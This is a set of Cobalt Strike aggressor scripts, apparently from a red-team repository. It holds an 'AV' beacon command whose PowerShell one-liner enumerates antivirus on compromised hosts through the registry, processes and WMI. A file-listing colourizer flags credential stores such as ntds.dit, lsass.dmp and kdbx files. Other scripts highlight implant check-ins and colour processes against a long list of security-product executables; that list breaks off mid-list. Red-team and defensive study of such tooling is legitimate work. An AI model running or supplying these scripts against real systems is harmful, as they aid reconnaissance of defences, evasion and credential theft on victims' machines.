6 | 7 | #Long ass one-liner :) 8 | $powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$zz.Id.ToString(), \$zz.Name.Split('\"')[0], \$zz.Path.ToString()}}}};\$av_loop3 = foreach (\$av2 in \$av_list){foreach (\$key1 in \$av_install1){if (\$key1.DisplayName -match \$av2 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key1.DisplayName.ToString(), \$key1.DisplayVersion.ToString(), \$key1.InstallDate.ToString()}}}};Write-Output \"`nPID|Name|Path`n\";Write-Output \$av_loop;Write-Output \"`nWindows Defender AV Signature Version:\";(Get-ItemProperty -Path \$regkey).ASSignatureVersion;Write-Output \"`nAV Name|Version|Install Date`n\";Write-Output \$av_loop2;Write-Output \$av_loop3"; 9 | 10 | #AV_Query Command Register 11 | beacon_command_register("AV", "查询杀软列表", 12 | "Syntax: AV_Query\n" . 
13 | "Checks HKLM hive for All AntiVirus installed"); 14 | 15 | #AV_Query alias 16 | alias AV{ 17 | blog($1, "\cBDetermining what AntiVirus is installed..."); 18 | bpowerpick!($1, $powershellcmd); 19 | bpause($1, int(30000)); 20 | bpowerpick!($1, "Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Query \"SELECT * FROM AntiVirusProduct\" | select-object displayName,pathToSignedReportingExe,timestamp| fl"); 21 | 22 | } 23 | -------------------------------------------------------------------------------- /scripts/cmd/FilesColor.cna: -------------------------------------------------------------------------------- 1 | # 2 | # Color Coded Files Listing. 3 | # 4 | # A nice script that colorizes your `ls` output and keeps track of uploaded files 5 | # to let you highlight them. 6 | # 7 | # Be wary of additional performance hit when listing big directories imposed by 8 | # their listing processing, coloring and sorting that this script does. 9 | # 10 | # Based on the original ProcessColor.cna idea by @r3dQu1nn. 11 | # 12 | # Author: 13 | # Mariusz B. / mgeeky, '20 14 | # 15 | # (https://github.com/mgeeky) 16 | # 17 | 18 | global('@UPLOADED_FILE_NAMES $TIMES_TO_DISPLAY_COLORS_SCHEME'); 19 | 20 | @UPLOADED_FILE_NAMES = @(); 21 | $TIMES_TO_DISPLAY_COLORS_SCHEME = 3; 22 | 23 | sub interpretSize { 24 | local('$s $size'); 25 | $s = $1; 26 | 27 | if($s == 0) { 28 | $size = ""; 29 | } 30 | else if($s < 1024) { 31 | $size .= $s . 
"B"; 32 | } 33 | else if($s < 1024 * 1024) { 34 | $size = round($s / 1024.0, 1); 35 | $size .= "KB"; 36 | } 37 | else if($s < 1024 * 1024 * 1024) { 38 | $size = round(($s / 1024.0) / 1024, 1); 39 | $size .= "MB"; 40 | } 41 | else if($s < 1024 * 1024 * 1024 * 1024) { 42 | $size = round((($s / 1024.0) / 1024) / 1024, 1); 43 | $size .= "GB"; 44 | } 45 | 46 | return $size; 47 | } 48 | 49 | set BEACON_OUTPUT_LS { 50 | local('$totalsize @subl $outls $temp $size $s $ext $dotpos $type $lastmod $name @lines @ls'); 51 | this('$once'); 52 | 53 | @lines = split("\n", ["$2" trim]); 54 | 55 | @configuration = @('config', 'conf', 'json', 'yml', 'xml', 'inf', 'properties', 'settings'); 56 | @sensitive = @('ost', 'dmp', 'sqlite', 'sqlite3', 'kdbx', 'kdb', 'dit', 'kirbi', 'ccache', 'kirbis', 'git'); 57 | @sensitive_files = @('ntds.dit', 'lsass.dmp'); 58 | @archives = @('rar', 'zip', '7z', 'tar', 'gz', 'bz2', 'iso'); 59 | @exes = @('msi', 'sys', 'exe', 'dll', 'bat', 'sct'); 60 | @docs = @('csv', 'odt', 'dotx', 'dotm', 'docm', 'xlam', 'xll', 'xlm', 'xlsm', 'xltx', 'msg', 'rtf', 'txt', 'pdf', 'docx', 'doc', 'xls', 'xlsx', 'ppt', 'pptx', 'pptm', 'odp', 'ppsm', 'ppa', 'ppam'); 61 | @sources = @('cpp', 'md', 'h', 'hpp', 'c', 'pl', 'sql', 'php', 'py', 'java', 'rb', 62 | 'html', 'js', 'css', 'asp', 'aspx', 'cs', 'vbs', 'vbe', 'jse', 'ps1', 'sln', 'vcxproj', 'csproj', 'gitignore', 'gitmodules', 'gitattributes'); 63 | 64 | 65 | if($once < $TIMES_TO_DISPLAY_COLORS_SCHEME) { 66 | $outls .= "\cC[*]\o Colors scheme:\n"; 67 | $outls .= "\cC[*]\o ---------------------------\n"; 68 | $outls .= "\cC[*]\o Directories: \c8 YELLOW \o\n"; 69 | $outls .= "\cC[*]\o Cobalt Strike Uploaded Files: \cBBLUE\o\n"; 70 | $outls .= "\cC[*]\o Sensitive files: \c4 RED \o\n"; 71 | $outls .= "\cC[*]\o Configuration files: \c3 DARK GREEN \o\n"; 72 | $outls .= "\cC[*]\o Archives: \c7 ORANGE \o\n"; 73 | $outls .= "\cC[*]\o Source codes: \cC DARK BLUE \o\n"; 74 | $outls .= "\cC[*]\o Executables: \cD MAGENTA \o\n"; 75 | 
$outls .= "\cC[*]\o Documents: \c9 GREEN \o\n"; 76 | $once += 1; 77 | } 78 | 79 | $outls .= "\c9[+]\o Location: \cC" . @lines[0] . "\o\n\n"; 80 | $outls .= " Size Type Last Modified Name\n"; 81 | $outls .= " ---- ---- ------------------- ----\n"; 82 | 83 | @subl = sublist(@lines, 1); 84 | $totalsize = 0; 85 | 86 | foreach $temp (@subl) { 87 | ($type, $s, $lastmod, $name) = split("\t", $temp); 88 | 89 | if ($name eq "." || $name eq "..") { 90 | continue; 91 | } 92 | 93 | if($type eq "D") { $type = "dir"; } 94 | else if($type eq "F") { $type = "fil"; } 95 | 96 | $s = int($s); 97 | $totalsize += $s; 98 | $size = interpretSize($s); 99 | 100 | $dotpos = lindexOf($name, '.'); 101 | $ext = ""; 102 | if(($dotpos) ) { 103 | $ext = lc(substr($name, $dotpos + 1)); 104 | } 105 | 106 | if($type eq "dir") { 107 | # Directories in YELLOW 108 | push(@ls, %(type => $type, name => $name, entry => "\c8 $[10]size $[7]type\o $[21]lastmod\c8 $name \o")); 109 | } 110 | else if($name in @UPLOADED_FILE_NAMES) { 111 | # Uploaded Files through Cobalt Strike (the ones we still keep track off) in Blue 112 | push(@ls, %(type => $type, name => $name, entry => "\cB $[10]size $[7]type\o $[21]lastmod\cB $name $+ \o")); 113 | } 114 | else if(($ext in @sensitive) || (lc($name) in @sensitive_files)) { 115 | # Sensitive files in Red 116 | push(@ls, %(type => $type, name => $name, entry => "\c4 $[10]size $[7]type\o $[21]lastmod\c4 $name \o")); 117 | } 118 | else if($ext in @exes) { 119 | # Executables in Magenta 120 | push(@ls, %(type => $type, name => $name, entry => "\cD $[10]size $[7]type\o $[21]lastmod\cD $name \o")); 121 | } 122 | else if($ext in @interesting) { 123 | # Configuration files in Dark Green 124 | push(@ls, %(type => $type, name => $name, entry => "\c3 $[10]size $[7]type\o $[21]lastmod\c3 $name \o")); 125 | } 126 | else if($ext in @sources) { 127 | # Source codes in Dark Blue 128 | push(@ls, %(type => $type, name => $name, entry => "\cC $[10]size $[7]type\o $[21]lastmod\cC $name \o")); 
129 | } 130 | else if($ext in @archives) { 131 | # Archives in Orange 132 | push(@ls, %(type => $type, name => $name, entry => "\c7 $[10]size $[7]type\o $[21]lastmod\c7 $name \o")); 133 | } 134 | else if($ext in @docs) { 135 | # Documents in Green 136 | push(@ls, %(type => $type, name => $name, entry => "\c9 $[10]size $[7]type\o $[21]lastmod\c9 $name \o")); 137 | } 138 | else { 139 | push(@ls, %(type => $type, name => $name, entry => " $[10]size $[7]type $[21]lastmod $name \o")); 140 | } 141 | } 142 | 143 | sort({ return ($1['type'] cmp $2['type']); }, @ls); 144 | 145 | foreach $temp (@ls) { 146 | $outls .= $temp['entry'] . "\n"; 147 | } 148 | 149 | $totalsize = interpretSize($totalsize); 150 | $outls .= "\nFiles and dirs count: " . size(@ls) . ", total size of files: $totalsize \n"; 151 | return $outls; 152 | } 153 | 154 | sub collectUploadedFiles { 155 | local('%entry %archives'); 156 | %archives = data_query('archives'); 157 | if(size(%archives) == 0) { 158 | return; 159 | } 160 | 161 | foreach %entry (%archives) { 162 | if (%entry['type'] ne "task") { 163 | continue; 164 | } 165 | 166 | if(indexOf(%entry['data'], "upload ") == 0) { 167 | if(%entry['data'] ismatch '^upload ("[^"]+"|[^\s]+) as ("[^"]+"|[^\s]+)$') { 168 | ($from, $to) = matched(); 169 | push(@UPLOADED_FILE_NAMES, getFileName($to)); 170 | } 171 | } 172 | } 173 | } 174 | 175 | on beacon_tasked { 176 | local('$from $to'); 177 | 178 | if($2 ismatch 'Tasked beacon to upload ("[^"]+"|[^\s]+) as (.+)') { 179 | ($from, $to) = matched(); 180 | push(@UPLOADED_FILE_NAMES, getFileName($to)); 181 | } 182 | } 183 | 184 | on beacon_input { 185 | local('$from $to'); 186 | 187 | if ($3 ismatch '^upload2? 
("[^"]+"|[^\s]+) ?("[^"]+"|[^\s]+)?$') { 188 | ($from, $to) = matched(); 189 | push(@UPLOADED_FILE_NAMES, getFileName($to)); 190 | } 191 | 192 | # Remove file track as the file was requested to be deleted 193 | #else if ($3 ismatch '(?:shell|powershell|run) del (\w+)') { 194 | # ($from) = matched(); 195 | # $from = getFileName($from); 196 | # if($from in @UPLOADED_FILE_NAMES) { 197 | # remove(@UPLOADED_FILE_NAMES, $from); 198 | # } 199 | #} 200 | } 201 | 202 | collectUploadedFiles(); 203 | -------------------------------------------------------------------------------- /scripts/cmd/Highlight_Beacons.cna: -------------------------------------------------------------------------------- 1 | # 2 | # Highlights new checking-in Beacons green and these exiting ones red for a defined time. 3 | # 4 | # Author: 5 | # Mariusz B. / mgeeky, "20 6 | # 7 | # (https://github.com/mgeeky) 8 | # 9 | 10 | global('%KNOWN_BEACONS $HIGHLIGHT_DURATION %HIGHLIGHTS'); 11 | 12 | # Hightlight duration expressed in miliseconds 13 | $HIGHLIGHT_DURATION = 5000; 14 | 15 | %HIGHLIGHTS = %( 16 | initial => "good", 17 | exit => "bad", 18 | exited => "ignore", 19 | error => "neutral", 20 | output => "" 21 | ); 22 | 23 | # --------------------------------------- 24 | # Do not alter variables below this point 25 | 26 | %KNOWN_BEACONS = %(); 27 | 28 | sub getBeaconEntry { 29 | return @(bdata($1)); 30 | } 31 | 32 | sub highlightBeacon { 33 | local('@entry $bid $col $cur'); 34 | (@entry, $bid, $col) = @_; 35 | $cur = binfo($bid, "_accent"); 36 | 37 | if($cur ne %HIGHLIGHTS[$col]) { 38 | %KNOWN_BEACONS[$bid]["prev-accent"] = $cur; 39 | highlight("beacons", @entry, %HIGHLIGHTS[$col]); 40 | } 41 | } 42 | 43 | on beacon_initial { 44 | local('@entry'); 45 | 46 | if($1 in keys(%KNOWN_BEACONS)) { 47 | return; 48 | } 49 | 50 | %KNOWN_BEACONS[$1] = %(); 51 | %KNOWN_BEACONS[$1]["ticks"] = ticks(); 52 | 53 | @entry = getBeaconEntry($1); 54 | if(@entry) { 55 | %KNOWN_BEACONS[$1]["status"] = 'initial'; 56 | 
highlightBeacon(@entry, $1, "initial"); 57 | } 58 | } 59 | 60 | on beacon_output { 61 | local('@entry'); 62 | 63 | if($1 !in keys(%KNOWN_BEACONS)) { 64 | %KNOWN_BEACONS[$1] = %(); 65 | } 66 | 67 | %KNOWN_BEACONS[$1]["ticks"] = ticks(); 68 | 69 | @entry = getBeaconEntry($1); 70 | if(@entry && (%KNOWN_BEACONS[$1]["status"] eq "") && (%HIGHLIGHTS["output"] ne "")) { 71 | highlightBeacon(@entry, $1, "output"); 72 | } 73 | } 74 | 75 | # doesn't work for some reason. 76 | on beacon_output_alt { 77 | local('@entry'); 78 | 79 | if($1 !in keys(%KNOWN_BEACONS)) { 80 | %KNOWN_BEACONS[$1] = %(); 81 | } 82 | 83 | %KNOWN_BEACONS[$1]["ticks"] = ticks(); 84 | 85 | @entry = getBeaconEntry($1); 86 | if(@entry && (%KNOWN_BEACONS[$1]["status"] eq "") && (%HIGHLIGHTS["output"] ne "")) { 87 | highlightBeacon(@entry, $1, "output"); 88 | } 89 | } 90 | 91 | on beacon_error { 92 | local('@entry'); 93 | 94 | if($1 !in keys(%KNOWN_BEACONS)) { 95 | %KNOWN_BEACONS[$1] = %(); 96 | } 97 | 98 | %KNOWN_BEACONS[$1]["ticks"] = ticks(); 99 | 100 | @entry = getBeaconEntry($1); 101 | if(@entry && (%HIGHLIGHTS["error"] ne "")) { 102 | %KNOWN_BEACONS[$1]["status"] = 'error'; 103 | highlightBeacon(@entry, $1, "error"); 104 | } 105 | } 106 | 107 | on beacon_input { 108 | local('@entry'); 109 | 110 | if($1 !in keys(%KNOWN_BEACONS)) { 111 | %KNOWN_BEACONS[$1] = %(); 112 | } 113 | 114 | if ($3 eq "exit") { 115 | %KNOWN_BEACONS[$1]["ticks"] = ticks(); 116 | @entry = getBeaconEntry($1); 117 | if(@entry) { 118 | %KNOWN_BEACONS[$1]["status"] = 'exiting'; 119 | highlightBeacon(@entry, $1, "exit"); 120 | } 121 | 122 | remove(%KNOWN_BEACONS, %KNOWN_BEACONS[$1]); 123 | } 124 | } 125 | 126 | on heartbeat_1s { 127 | local('$diff $b @entry'); 128 | 129 | foreach $bid (keys(%KNOWN_BEACONS)) { 130 | $b = %KNOWN_BEACONS[$bid]; 131 | if("ticks" in keys($b)) { 132 | if(strlen($b["ticks"]) > 0) { 133 | $diff = ticks() - $b["ticks"]; 134 | if($diff >= $HIGHLIGHT_DURATION) { 135 | @entry = getBeaconEntry($bid); 136 | if(@entry) 
{ 137 | if(%KNOWN_BEACONS[$bid]["status"] eq "exiting") { 138 | %KNOWN_BEACONS[$1]["status"] = 'exited'; 139 | highlightBeacon(@entry, $bid, "exited"); 140 | } 141 | else { 142 | #%KNOWN_BEACONS[$bid]["prev-accent"] = binfo($1, "_accent"); 143 | highlight("beacons", @entry, %KNOWN_BEACONS[$bid]["prev-accent"]); 144 | %KNOWN_BEACONS[$1]["status"] = ""; 145 | } 146 | } 147 | 148 | %KNOWN_BEACONS[$bid]["ticks"] = ""; 149 | } 150 | } 151 | } 152 | } 153 | } 154 | -------------------------------------------------------------------------------- /scripts/cmd/ProcessColor.cna: -------------------------------------------------------------------------------- 1 | #Color Coded Process Listing 2 | #Author: @r3dQu1nn 3 | #Takes the PS output in CS and color codes all AV processes, explorer process, browsers processes, and current process running 4 | #Thanks to @oldb00t for creating the original beacon-ps-highlight.cna script! Script here: https://github.com/oldb00t/AggressorScripts/tree/master/Ps-highlight 5 | #This script removes the need for the av_hips_executables.txt requirement 6 | 7 | set BEACON_OUTPUT_PS { 8 | 9 | $bd = bdata($1); 10 | @av = @("Tanium.exe", "360RP.exe", "360SD.exe", "360Safe.exe", "360leakfixer.exe", "360rp.exe", "360safe.exe", "360sd.exe", "360tray.exe", "AAWTray.exe", "ACAAS.exe", "ACAEGMgr.exe", "ACAIS.exe", "AClntUsr.EXE", "ALERT.EXE", "ALERTSVC.EXE", "ALMon.exe", "ALUNotify.exe", "ALUpdate.exe", "ALsvc.exe", "AVENGINE.exe", "AVGCHSVX.EXE", "AVGCSRVX.EXE", "AVGIDSAgent.exe", "AVGIDSMonitor.exe", "AVGIDSUI.exe", "AVGIDSWatcher.exe", "AVGNSX.EXE", "AVKProxy.exe", "AVKService.exe", "AVKTray.exe", "AVKWCtl.exe", "AVP.EXE", "AVP.exe", "AVPDTAgt.exe", "AcctMgr.exe", "Ad-Aware.exe", "Ad-Aware2007.exe", "AddressExport.exe", "AdminServer.exe", "Administrator.exe", "AeXAgentUIHost.exe", "AeXNSAgent.exe", "AeXNSRcvSvc.exe", "AlertSvc.exe", "AlogServ.exe", "AluSchedulerSvc.exe", "AnVir.exe", "AppSvc32.exe", "AtrsHost.exe", "Auth8021x.exe", "AvastSvc.exe", 
"AvastUI.exe", "Avconsol.exe", "AvpM.exe", "Avsynmgr.exe", "Avtask.exe", "BLACKD.exe", "BWMeterConSvc.exe", "CAAntiSpyware.exe", "CALogDump.exe", "CAPPActiveProtection.exe", "CAPPActiveProtection.exe", "CB.exe", "CCAP.EXE", "CCenter.exe", "CClaw.exe", "CLPS.exe", "CLPSLA.exe", "CLPSLS.exe", "CNTAoSMgr.exe", "CPntSrv.exe", "CTDataLoad.exe", "CertificationManagerServiceNT.exe", "ClShield.exe", "ClamTray.exe", "ClamWin.exe", "Console.exe", "CylanceUI.exe", "DAO_Log.exe", "DLService.exe", "DLTray.EXE", "DLTray.exe", "DRWAGNTD.EXE", "DRWAGNUI.EXE", "DRWEB32W.EXE", "DRWEBSCD.EXE", "DRWEBUPW.EXE", "DRWINST.EXE", "DSMain.exe", "DWHWizrd.exe", "DefWatch.exe", "DolphinCharge.exe", "EHttpSrv.exe", "EMET_Agent.exe", "EMET_Service.exe", "EMLPROUI.exe", "EMLPROXY.exe", "EMLibUpdateAgentNT.exe", "ETConsole3.exe", "ETCorrel.exe", "ETLogAnalyzer.exe", "ETReporter.exe", "ETRssFeeds.exe", "EUQMonitor.exe", "EndPointSecurity.exe", "EngineServer.exe", "EntityMain.exe", "EtScheduler.exe", "EtwControlPanel.exe", "EventParser.exe", "FAMEH32.exe", "FCDBLog.exe", "FCH32.exe", "FPAVServer.exe", "FProtTray.exe", "FSCUIF.exe", "FSHDLL32.exe", "FSM32.exe", "FSMA32.exe", "FSMB32.exe", "FWCfg.exe", "FireSvc.exe", "FireTray.exe", "FirewallGUI.exe", "ForceField.exe", "FortiProxy.exe", "FortiTray.exe", "FortiWF.exe", "FrameworkService.exe", "FreeProxy.exe", "GDFirewallTray.exe", "GDFwSvc.exe", "HWAPI.exe", "ISNTSysMonitor.exe", "ISSVC.exe", "ISWMGR.exe", "ITMRTSVC.exe", "ITMRT_SupportDiagnostics.exe", "ITMRT_TRACE.exe", "IcePack.exe", "IdsInst.exe", "InoNmSrv.exe", "InoRT.exe", "InoRpc.exe", "InoTask.exe", "InoWeb.exe", "IsntSmtp.exe", "KABackReport.exe", "KANMCMain.exe", "KAVFS.EXE", "KAVStart.exe", "KLNAGENT.EXE", "KMailMon.exe", "KNUpdateMain.exe", "KPFWSvc.exe", "KSWebShield.exe", "KVMonXP.exe", "KVMonXP_2.exe", "KVSrvXP.exe", "KWSProd.exe", "KWatch.exe", "KavAdapterExe.exe", "KeyPass.exe", "KvXP.exe", "LUALL.EXE", "LWDMServer.exe", "LockApp.exe", "LockAppHost.exe", "LogGetor.exe", 
"MCSHIELD.EXE", "MCUI32.exe", "MSASCui.exe", "ManagementAgentNT.exe", "McAfeeDataBackup.exe", "McEPOC.exe", "McEPOCfg.exe", "McNASvc.exe", "McProxy.exe", "McScript_InUse.exe", "McWCE.exe", "McWCECfg.exe", "Mcshield.exe", "Mctray.exe", "MgntSvc.exe", "MpCmdRun.exe", "MpfAgent.exe", "MpfSrv.exe", "MsMpEng.exe", "NAIlgpip.exe", "NAVAPSVC.EXE", "NAVAPW32.EXE", "NCDaemon.exe", "NIP.exe", "NJeeves.exe", "NLClient.exe", "NMAGENT.EXE", "NOD32view.exe", "NPFMSG.exe", "NPROTECT.EXE", "NRMENCTB.exe", "NSMdtr.exe", "NTRtScan.exe", "NVCOAS.exe", "NVCSched.exe", "NavShcom.exe", "Navapsvc.exe", "NaveCtrl.exe", "NaveLog.exe", "NaveSP.exe", "Navw32.exe", "Navwnt.exe", "Nip.exe", "Njeeves.exe", "Npfmsg2.exe", "Npfsvice.exe", "NscTop.exe", "Nvcoas.exe", "Nvcsched.exe", "Nymse.exe", "OLFSNT40.EXE", "OMSLogManager.exe", "ONLINENT.exe", "ONLNSVC.exe", "OfcPfwSvc.exe", "PASystemTray.exe", "PAVFNSVR.exe", "PAVSRV51.exe", "PNmSrv.exe", "POPROXY.EXE", "POProxy.exe", "PPClean.exe", "PPCtlPriv.exe", "PQIBrowser.exe", "PSHost.exe", "PSIMSVC.EXE", "PXEMTFTP.exe", "PadFSvr.exe", "Pagent.exe", "Pagentwd.exe", "PavBckPT.exe", "PavFnSvr.exe", "PavPrSrv.exe", "PavProt.exe", "PavReport.exe", "Pavkre.exe", "PcCtlCom.exe", "PcScnSrv.exe", "PccNTMon.exe", "PccNTUpd.exe", "PpPpWallRun.exe", "PrintDevice.exe", "ProUtil.exe", "PsCtrlS.exe", "PsImSvc.exe", "PwdFiltHelp.exe", "Qoeloader.exe", "RAVMOND.exe", "RAVXP.exe", "RNReport.exe", "RPCServ.exe", "RSSensor.exe", "RTVscan.exe", "RapApp.exe", "Rav.exe", "RavAlert.exe", "RavMon.exe", "RavMonD.exe", "RavService.exe", "RavStub.exe", "RavTask.exe", "RavTray.exe", "RavUpdate.exe", "RavXP.exe", "RealMon.exe", "Realmon.exe", "RedirSvc.exe", "RegMech.exe", "ReporterSvc.exe", "RouterNT.exe", "Rtvscan.exe", "SAFeService.exe", "SAService.exe", "SAVAdminService.exe", "SAVFMSESp.exe", "SAVMain.exe", "SAVScan.exe", "SCANMSG.exe", "SCANWSCS.exe", "SCFManager.exe", "SCFService.exe", "SCFTray.exe", "SDTrayApp.exe", "SEVINST.EXE", "SMEX_ActiveUpdate.exe", "SMEX_Master.exe", 
"SMEX_RemoteConf.exe", "SMEX_SystemWatch.exe", "SMSECtrl.exe", "SMSELog.exe", "SMSESJM.exe", "SMSESp.exe", "SMSESrv.exe", "SMSETask.exe", "SMSEUI.exe", "SNAC.EXE", "SNAC.exe", "SNDMon.exe", "SNDSrvc.exe", "SPBBCSvc.exe", "SPIDERML.EXE", "SPIDERNT.EXE", "SSM.exe", "SSScheduler.exe", "SVCharge.exe", "SVDealer.exe", "SVFrame.exe", "SVTray.exe", "SWNETSUP.EXE", "SavRoam.exe", "SavService.exe", "SavUI.exe", "ScanMailOutLook.exe", "SeAnalyzerTool.exe", "SemSvc.exe", "SescLU.exe", "SetupGUIMngr.exe", "SiteAdv.exe", "Smc.exe", "SmcGui.exe", "SnHwSrv.exe", "SnICheckAdm.exe", "SnIcon.exe", "SnSrv.exe", "SnicheckSrv.exe", "SpIDerAgent.exe", "SpntSvc.exe", "SpyEmergency.exe", "SpyEmergencySrv.exe", "StOPP.exe", "StWatchDog.exe", "SymCorpUI.exe", "SymSPort.exe", "TBMon.exe", "TFGui.exe", "TFService.exe", "TFTray.exe", "TFun.exe", "TIASPN~1.EXE", "TSAnSrf.exe", "TSAtiSy.exe", "TScutyNT.exe", "TSmpNT.exe", "TmListen.exe", "TmPfw.exe", "Tmntsrv.exe", "Traflnsp.exe", "TrapTrackerMgr.exe", "UPSCHD.exe", "UcService.exe", "UdaterUI.exe", "UmxAgent.exe", "UmxCfg.exe", "UmxFwHlp.exe", "UmxPol.exe", "Up2date.exe", "UpdaterUI.exe", "UrlLstCk.exe", "UserActivity.exe", "UserAnalysis.exe", "UsrPrmpt.exe", "V3Medic.exe", "V3Svc.exe", "VPC32.exe", "VPDN_LU.exe", "VPTray.exe", "VSStat.exe", "VsStat.exe", "VsTskMgr.exe", "WEBPROXY.EXE", "WFXCTL32.EXE", "WFXMOD32.EXE", "WFXSNT40.EXE", "WebProxy.exe", "WebScanX.exe", "WinRoute.exe", "WrSpySetup.exe", "ZLH.exe", "Zanda.exe", "ZhuDongFangYu.exe", "Zlh.exe", "_avp32.exe", "_avpcc.exe", "_avpm.exe", "aAvgApi.exe", "aawservice.exe", "acaif.exe", "acctmgr.exe", "ackwin32.exe", "aclient.exe", "adaware.exe", "advxdwin.exe", "aexnsagent.exe", "aexsvc.exe", "aexswdusr.exe", "aflogvw.exe", "afwServ.exe", "agentsvr.exe", "agentw.exe", "ahnrpt.exe", "ahnsd.exe", "ahnsdsv.exe", "alertsvc.exe", "alevir.exe", "alogserv.exe", "alsvc.exe", "alunotify.exe", "aluschedulersvc.exe", "amon9x.exe", "amswmagt.exe", "anti-trojan.exe", "antiarp.exe", "antivirus.exe", 
"ants.exe", "aphost.exe", "apimonitor.exe", "aplica32.exe", "aps.exe", "apvxdwin.exe", "arr.exe", "ashAvast.exe", "ashBug.exe", "ashChest.exe", "ashCmd.exe", "ashDisp.exe", "ashEnhcd.exe", "ashLogV.exe", "ashMaiSv.exe", "ashPopWz.exe", "ashQuick.exe", "ashServ.exe", "ashSimp2.exe", "ashSimpl.exe", "ashSkPcc.exe", "ashSkPck.exe", "ashUpd.exe", "ashWebSv.exe", "ashdisp.exe", "ashmaisv.exe", "ashserv.exe", "ashwebsv.exe", "asupport.exe", "aswDisp.exe", "aswRegSvr.exe", "aswServ.exe", "aswUpdSv.exe", "aswUpdsv.exe", "aswWebSv.exe", "aswupdsv.exe", "atcon.exe", "atguard.exe", "atro55en.exe", "atupdater.exe", "atwatch.exe", "atwsctsk.exe", "au.exe", "aupdate.exe", "aupdrun.exe", "aus.exe", "auto-protect.nav80try.exe", "autodown.exe", "autotrace.exe", "autoup.exe", "autoupdate.exe", "avEngine.exe", "avadmin.exe", "avcenter.exe", "avconfig.exe", "avconsol.exe", "ave32.exe", "avengine.exe", "avesvc.exe", "avfwsvc.exe", "avgam.exe", "avgamsvr.exe", "avgas.exe", "avgcc.exe", "avgcc32.exe", "avgcsrvx.exe", "avgctrl.exe", "avgdiag.exe", "avgemc.exe", "avgfws8.exe", "avgfws9.exe", "avgfwsrv.exe", "avginet.exe", "avgmsvr.exe", "avgnsx.exe", "avgnt.exe", "avgregcl.exe", "avgrssvc.exe", "avgrsx.exe", "avgscanx.exe", "avgserv.exe", "avgserv9.exe", "avgsystx.exe", "avgtray.exe", "avguard.exe", "avgui.exe", "avgupd.exe", "avgupdln.exe", "avgupsvc.exe", "avgvv.exe", "avgw.exe", "avgwb.exe", "avgwdsvc.exe", "avgwizfw.exe", "avkpop.exe", "avkserv.exe", "avkservice.exe", "avkwctl9.exe", "avltmain.exe", "avmailc.exe", "avmcdlg.exe", "avnotify.exe", "avnt.exe", "avp.exe", "avp32.exe", "avpcc.exe", "avpdos32.exe", "avpexec.exe", "avpm.exe", "avpncc.exe", "avps.exe", "avptc32.exe", "avpupd.exe", "avscan.exe", "avsched32.exe", "avserver.exe", "avshadow.exe", "avsynmgr.exe", "avwebgrd.exe", "avwin.exe", "avwin95.exe", "avwinnt.exe", "avwupd.exe", "avwupd32.exe", "avwupsrv.exe", "avxmonitor9x.exe", "avxmonitornt.exe", "avxquar.exe", "backweb.exe", "bargains.exe", "basfipm.exe", 
"bd_professional.exe", "bdagent.exe", "bdc.exe", "bdlite.exe", "bdmcon.exe", "bdss.exe", "bdsubmit.exe", "beagle.exe", "belt.exe", "bidef.exe", "bidserver.exe", "bipcp.exe", "bipcpevalsetup.exe", "bisp.exe", "blackd.exe", "blackice.exe", "blink.exe", "blss.exe", "bmrt.exe", "bootconf.exe", "bootwarn.exe", "borg2.exe", "bpc.exe", "bpk.exe", "brasil.exe", "bs120.exe", "bundle.exe", "bvt.exe", "bwgo0000.exe", "ca.exe", "caav.exe", "caavcmdscan.exe", "caavguiscan.exe", "caf.exe", "cafw.exe", "caissdt.exe", "capfaem.exe", "capfasem.exe", "capfsem.exe", "capmuamagt.exe", "casc.exe", "casecuritycenter.exe", "caunst.exe", "cavrep.exe", "cavrid.exe", "cavscan.exe", "cavtray.exe", "ccApp.exe", "ccEvtMgr.exe", "ccLgView.exe", "ccProxy.exe", "ccSetMgr.exe", "ccSetmgr.exe", "ccSvcHst.exe", "ccap.exe", "ccapp.exe", "ccevtmgr.exe", "cclaw.exe", "ccnfagent.exe", "ccprovsp.exe", "ccproxy.exe", "ccpxysvc.exe", "ccschedulersvc.exe", "ccsetmgr.exe", "ccsmagtd.exe", "ccsvchst.exe", "ccsystemreport.exe", "cctray.exe", "ccupdate.exe", "cdp.exe", "cfd.exe", "cfftplugin.exe", "cfgwiz.exe", "cfiadmin.exe", "cfiaudit.exe", "cfinet.exe", "cfinet32.exe", "cfnotsrvd.exe", "cfp.exe", "cfpconfg.exe", "cfpconfig.exe", "cfplogvw.exe", "cfpsbmit.exe", "cfpupdat.exe", "cfsmsmd.exe", "checkup.exe", "cka.exe", "clamscan.exe", "claw95.exe", "claw95cf.exe", "clean.exe", "cleaner.exe", "cleaner3.exe", "cleanpc.exe", "cleanup.exe", "click.exe", "cmdagent.exe", "cmdinstall.exe", "cmesys.exe", "cmgrdian.exe", "cmon016.exe", "comHost.exe", "connectionmonitor.exe", "control_panel.exe", "cpd.exe", "cpdclnt.exe", "cpf.exe", "cpf9x206.exe", "cpfnt206.exe", "crashrep.exe", "csacontrol.exe", "csinject.exe", "csinsm32.exe", "csinsmnt.exe", "csrss_tc.exe", "ctrl.exe", "cv.exe", "cwnb181.exe", "cwntdwmo.exe", "cz.exe", "datemanager.exe", "dbserv.exe", "dbsrv9.exe", "dcomx.exe", "defalert.exe", "defscangui.exe", "defwatch.exe", "deloeminfs.exe", "deputy.exe", "diskmon.exe", "divx.exe", "djsnetcn.exe", "dllcache.exe", 
